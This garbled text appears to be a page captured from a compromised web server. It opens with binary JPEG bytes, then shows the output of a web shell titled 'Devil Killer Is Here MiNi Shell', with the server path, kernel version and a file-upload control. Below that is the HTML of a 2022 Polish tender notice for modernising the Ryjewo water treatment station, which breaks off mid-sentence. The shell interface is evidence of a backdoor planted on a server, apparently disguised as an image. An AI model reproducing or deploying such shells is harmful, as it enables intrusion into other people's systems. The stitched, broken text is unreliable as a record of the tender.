JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220901/0032907601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja strategicznej infrastruktury wodnej na terenie Gminy Ryjewo, poprzez modernizację Stacji Uzdatniania Wody w miejscowości Ryjewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RYJEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170747796</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lipowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ryjewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55 277 42 21</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">55 277 43 21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@ryjewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ryjewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja strategicznej infrastruktury wodnej na terenie Gminy Ryjewo, poprzez modernizację Stacji Uzdatniania Wody w miejscowości Ryjewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6cf06722-28fb-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00329076</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032329/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Modernizacja strategicznej infrastruktury wodnej na terenie Gminy Ryjewo, poprzez modernizację Stacji Uzdatniania Wody w miejscowości Ryjewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 3 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ryjewo.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ryjewo.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający wskazuje informacje, o których mowa w Rozporządzeniu Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresem https://ryjewo.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge<br/>• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe);</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:    <br/>▪ Administratorem Pani/Pana danych osobowych jest Wójt Gminy Ryjewo ul. Lipowa 1, 82 – 420 Ryjewo, adres e-mail: ug@ryjewo.pl, tel. 55 277 4270; <br/>1.	Administrator powołał Inspektora Ochrony Danych. Ma Pani/Pan prawo do skontaktowania się z Inspektorem Ochrony Danych poprzez wysłanie wiadomości elektronicznej na adres: inspektor@cbi24.pl <br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego ZP.271.012.2022 na zamówienie pn: Modernizacja strategicznej infrastruktury wodnej na terenie Gminy Ryjewo, poprzez modernizację Stacji Uzdatniania Wody w miejscowości Ryjewo prowadzonym w trybie przetargu nieograniczonego; <br/>▪ Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>▪ obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy;    <br/>▪ w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>▪ posiada Pani/Pan prawo dostępu do danych osobowych, które Pani/Pana dotyczą, prawo do sprostowania Pani/Pana danych osobowych, prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,    <br/>▪ w przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, ma Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych <br/>Osobowych, <br/>▪ nie przysługuje Pani/Panu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.012.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2000000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.3.) Opis potrzeb Zamawiającego</h3><span class="normal">Określenie przedmiotu zamówienia – Przedmiotem zamówienia są prace projektowe i wykonawstwo modernizacji stacji Uzdatniania Wody w Ryjewie. <br/>Opis potrzeb zamawiającego i cechy charakterystyczne dostaw, robót budowlanych lub usług, stanowiące przedmiot zamówienia. Punkty od 1 do 7. Prace modernizacyjne należy wykonywać podczas pracy stacji. <br/>Minimalne wymagania dotyczące przedmiotu zamówienia lub realizacji zamówienia, niepodlegające negocjacjom, które musza spełniać wszystkie oferty. Punkty od 1 do 7.<br/>Opis kryteriów oceny ofert, którymi zamawiający będzie się kierował przy wyborze oferty wraz z podaniem wag tych kryteriów i sposobu oceny ofert, a jeżeli przypisanie wag jest niemożliwe na etapie wszczęcia postępowania z obiektywnych przyczyn, zamawiający wskazuje kryteria oceny ofert od najważniejszego do najmniej ważnego. Zamawiający przy wyborze oferty będzie kierował się kryterium cena i kryterium doświadczenie wykonawcy oraz gwarancji.<br/>1.	Wymogi dotyczące etapu projektowego<br/>Wymagania w zakresie projektowania mechanicznego<br/>Zamawiający wymaga, aby Wykonawca na etapie przedłożenia do zatwierdzenia projektu budowlanego, w kluczowym zakresie jakim jest technologia uzdatniania wody, przedstawił poniższą dokumentację:<br/>- Wizualizacja 3D dostarczanej wykonywanej technologii montowanej wewnątrz budynku SUW. Wizualizacja powinna przedstawiać wszystkie urządzenia technologiczne podpory oraz musi odzwierciedlać wnętrze hali SUW, w którym montowane będą urządzenia technologiczne. Wizualizacja musi być wykonana w postaci 3 wymiarowego modelu dla którego Inwestor będzie miał możliwość obrócenia i zbliżenia lub oddalenia wybranych szczegółów. Plik/pliki z wizualizacją muszą być możliwe do otwarcia przez Inwestora z pomocą ogólnie dostępnych narzędzi takich jak przeglądarka internetowa lub PDF 3D.<br/>- Rzuty, widoki i przekroje z naniesionymi wymiarami przejść i dojść oraz średnicami i opisami rurociągów technologicznych, armatury i zamontowanych urządzeń.<br/>- Uzupełnione wnioski materiałowe dla urządzeń i podzespołów przedstawionych na dokumentacji wraz z kartami katalogowymi.<br/>Wymagania w zakresie projektowania elektrycznego i wizualizacji<br/>Zamawiający wymaga, aby Wykonawca na etapie przedłożenia do zatwierdzenia projektu budowlanego branży AKPiA, przedstawił poniższą dokumentację:<br/>- Schematy elektryczne.<br/>- Rysunki rozmieszczenia aparatów na płytach montażowych szaf sterowniczych.<br/>- Rysunki elewacji i rozmieszczenia aparatów na drzwiach szafy.<br/>- Algorytmy i opisy działania urządzeń.<br/>- Uzupełnione wnioski materiałowe dla urządzeń i podzespołów przedstawionych na dokumentacji wraz z kartami katalogowymi.<br/>- Wygląd wszystkich ekranów wizualizacji w tym ekranu głównego, ekranów raportów, ekranów wykresów, ekranów zdarzeń i alarmów .<br/>- Instrukcja obsługi wizualizacji z opisem jej działania.<br/>2.	Wymogi dotyczące zatwierdzania wniosków materiałowych.<br/>Inwestor wymaga, aby każdy materiał przed wbudowaniem uzyskał akceptację Inwestora oraz Inspektora odpowiedniej specjalizacji. W tym celu wykonawca dostarczy do Inwestora wypełniony wniosek materiałowy wraz z odpowiednimi oświadczeniami. Wzór wniosku znajdować się będzie we wzorze umowy. <br/>3.	Wymogi dotyczące bezpieczeństwa eksploatacji urządzeń.<br/>Inwestor nie wyraża zgody, aby proponowane przez wykonawcę urządzenia były urządzeniami prototypowymi. Wymogiem bezpieczeństwa jest by były to rozwiązania sprawdzone, pracujące na innych obiektach przez okres nie krótszy niż 3 lata. Zamawiający zastrzega sobie prawo dokonania oględzin i sprawdzenia poprawności działania proponowanego rozwiązania. <br/>4.	Odbiory i nadzór Inwestorski.<br/>Lp	Etap odbioru/kontroli	Miejsce odbioru	Przedstawiciele Inwestora<br/>1.	Etap projektu mechanicznego -kontrola dokumentacji montażowej pod kątem wymogów BHP, oraz poprawności rozwiązań pod kątem hydrauliki na podstawie przygotowanej przez wykonawcę wizualizacji 3D, dostarczanych urządzeń i budynku oraz rzutów, widoków i przekrojów dokumentacji montażowej. Dokumentacja powinna zawierać co najmniej naniesione wymiary przejść i dojść oraz opisy rurociągów (funkcja i średnica). Siedziba Inwestora	Inspektor Sanitarny<br/>Inspektor BHP<br/>Inspektor Budowlany<br/><br/>2.	Etap projektu elektrycznego -kontrola dokumentacji elektrycznej w tym schematów i algorytmów pracy urządzeń.	Siedziba Inwestora	Inspektor branży Elektrycznej<br/>Inspektor Sanitarny<br/>3. Etap zamawiania urządzeń –akceptacja wniosków materiałowych	Siedziba Inwestora	Inspektor Sanitarny<br/>Inspektor Budowlany<br/>Inspektor branży Elektrycznej<br/><br/><br/>4.	Etap wykonania konstrukcji spawanych.<br/>Wykonanie rurociągów, modułów technologicznych urządzeń przed trawieniem.	Zakład wytwórczy Wykonawcy lub podwykonawcy robót spawalniczych.	Inspektor Sanitarny<br/><br/>5.	Etap wykonania trawienia i pasywacji. Trawienie i pasywacja modułów SUW ze stali 304 oraz 316, w trakcie procesu trawienia i pasywacji.	Zakład wytwórczy Wykonawcy lub podwykonawcy robót trawienia i pasywacji.	Inspektor Sanitarny<br/><br/>6. Próby szczelności i próby ruchowe Zakład wytwórczy Wykonawcy	Inspektor Sanitarny<br/>7.	Próby układów rozdzielni zasilająco - sterujących	Zakład wytwórczy Wykonawcy	Inspektor branży Elektrycznej<br/>8.	Montaż końcowy mechaniczny – odbiór urządzeń	Miejsce montażu docelowego urządzeń SUW	Inspektor Sanitarny<br/>Inspektor Budowlany<br/>9. Montaż końcowy elektryczny – odbiór urządzeń	Miejsce montażu docelowego urządzeń SUW	Inspektor branży Elektrycznej<br/>10.	Rozruch technologiczny	Miejsce montażu docelowego urządzeń SUW	Inspektor Sanitarny<br/>Inspektor Budowlany<br/>Inspektor branży Elektrycznej<br/>11.	Zakończenie wszystkich prac montażowych i zgłoszenie inwestycji do odbioru końcowego	Miejsce montażu docelowego urządzeń SUW	Inspektor Sanitarny<br/>Inspektor Budowlany<br/>Inspektor branży Elektrycznej<br/>Inspektor BHP<br/>Inspektor p-poż.<br/><br/>5.	Wymogi dotyczące wykonania urządzeń- Prace Spawalnicze<br/>Wymagania w zakresie prac spawalniczych <br/>Wykonawca prac spawalniczych musi posiadać certyfikowany system zarządzania jakością w spawalnictwie w zakresie pełnych wymagań wg normy EN-ISO 3834-2; <br/>Wykonawca musi zatrudniać spawaczy i operatorów urządzeń spawalniczych posiadających aktualne uprawnienia;<br/><br/>Wykonawca prac spawalniczych zobowiązany jest do dostarczenia następujących dokumentów:<br/>- dzienniki spawania;<br/>- lista spawaczy wraz z kopią uprawnień;<br/>- lista personelu nadzoru spawalniczego wraz z kopią uprawnień;<br/>- protokół z kontroli wymiarowej konstrukcji spawanych;<br/><br/>6.	Wymogi dotyczące wykonania urządzeń- Trawienie i Pasywacja<br/>Mając na uwadze zapewnienie odpowiedniej trwałości elementów wykonanych ze stali kwasoodpornych ich powierzchnie bezwzględnie należy poddać trawieniu, a następnie pasywacji. Zabiegi te muszą być koniecznie przeprowadzone na wewnętrznych oraz na zewnętrznych powierzchniach elementów. <br/>Stale kwasoodporne nie poddane zabiegom trawienia i pasywacji po zakończeniu procesów spawalniczych, mają bardzo wysoką skłonność do powstawania korozji wżerowej, w środowiskach zawierających wolny chlor, który jest powszechnie stosowany w stacjach uzdatniania wody, w procesie dezynfekcji. Istotnym zagrożeniem jest również korozja podosadowa, która może wystąpić w sytuacjach wystąpienia osadów np. przy eksploatacji SUW z niepełną wydajnością. Oba rodzaje korozji mogą w bardzo krótkim czasie doprowadzić do nieodwracalnego uszkodzenia elementów.<br/><br/>Operacje trawienia, a następnie pasywacji prowadzić w sposób następujący:<br/>1.	Rurociągi - wykonać trawienie, a następnie pasywację za pomocą kąpieli zanurzeniowej. Operacje prowadzić dla powierzchni zewnętrznych i wewnętrznych.<br/>2.	Konstrukcje wsporcze - wykonać trawienie, a następnie pasywację za pomocą kąpieli zanurzeniowej lub natrysku. Operacje prowadzić dla powierzchni zewnętrznych i wewnętrznych.<br/>3.	Korpus separatora, zbiornik reakcji i zbiornik oczyszczonych wód popłucznych- wykonać trawienie, a następnie pasywację za pomocą natrysku. Operacje prowadzić dla powierzchni zewnętrznych i wewnętrznych. <br/>Powyższe wymagania nie dotyczą:<br/>1.	Elementów złącznych (śruby, nakrętki, podkładki)<br/><br/>Uwaga!!!<br/>Ze względu na wysokie ryzyko wystąpienia skażenia podczas prowadzenia operacji trawienia i pasywacji, a Stacja Uzdatniania Wody znajduje się w strefie bezpośredniej ochrony sanitarnej, nie dopuszcza się wykonywania operacji trawienia i pasywacji na terenie SUW. <br/><br/><br/><br/><br/><br/><br/><br/><br/>Dokumenty i potwierdzenia.<br/><br/>Ze względu na zanikający charakter prac związanych z trawieniem i pasywacją czynności te bezwzględnie należy prowadzić należy w porozumieniu i pod kontrolą Inspektora Nadzoru wskazanego przez Inwestora.<br/><br/>Wykonanie operacji trawienia i pasywacji należy potwierdzić protokołem zdawczo odbiorczym zawierającym spis elementów poddanych operacjom oraz certyfikatem zawierającym: <br/>- potwierdzenie wykonania operacji trawienia i pasywacji dla elementów ujętych w protokole <br/> zdawczo odbiorczym wraz z wyspecyfikowaniem użytych środków trawiących i pasywujących;<br/>- wyniki pomiaru potencjału powierzchni; <br/>- informację na temat czasu kąpieli lub natrysku i temperatury. <br/>Do powyższego certyfikatu należy dołączyć kartę charakterystyki środka trawiącego i środka pasywującego.<br/>W wypadku przeprowadzania operacji trawienia i pasywacji przez wykonawcę, a nie przez wyspecjalizowany zakład, wykonawca zobowiązany jest załączyć umowę zawartą z zakładem utylizacji odpadów lub dokument potwierdzający przekazanie odpadu niebezpiecznego do utylizacji (kwaśna popłuczyna po procesach trawienia i pasywacji z zawartością metali ciężkich).<br/><br/><br/>7.	Dostawa i rozruch<br/><br/>Na obiekt dostarczyć kompletne prefabrykowane moduły technologiczne stacji uzdatniania wody. Moduły stacji powinny zostać dostarczone po pomyślnym przeprowadzaniu kontroli jakości i rozruchu wstępnym w zakładzie wytwórczym producenta.</span> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45252126-7 - Roboty budowlane w zakresie zakładów uzdatniania wody pitnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Wiedza i doświadczenie<br/>Do postępowania zostaną dopuszczeni oferenci spełniający łącznie oba poniższe kryteria.<br/>•	Oferent wybudował lub zmodernizował w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie, co najmniej dwie stacje uzdatniania wody, w technologii filtrów ciśnieniowych, prefabrykowanych modułów technologicznych, w wykonaniu orurowania ze stali kwasoodpornej, o wydajności technologii uzdatniania nie mniejszej niż Q maxh = 35 m3/h.<br/>•	Oferent wykonał i uruchomił w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie, co najmniej dwa zestawy pompowe drugiego stopnia zasilające miejską lub gminną sieć wodociągową przesyłową, o wydajności minimum 35 m3/h oraz ze sterowaniem wyposażonym w funkcje zaawansowanego oszczędzania energii elektrycznej i redukcji strat wody.<br/>2.	Osoby zdolne do 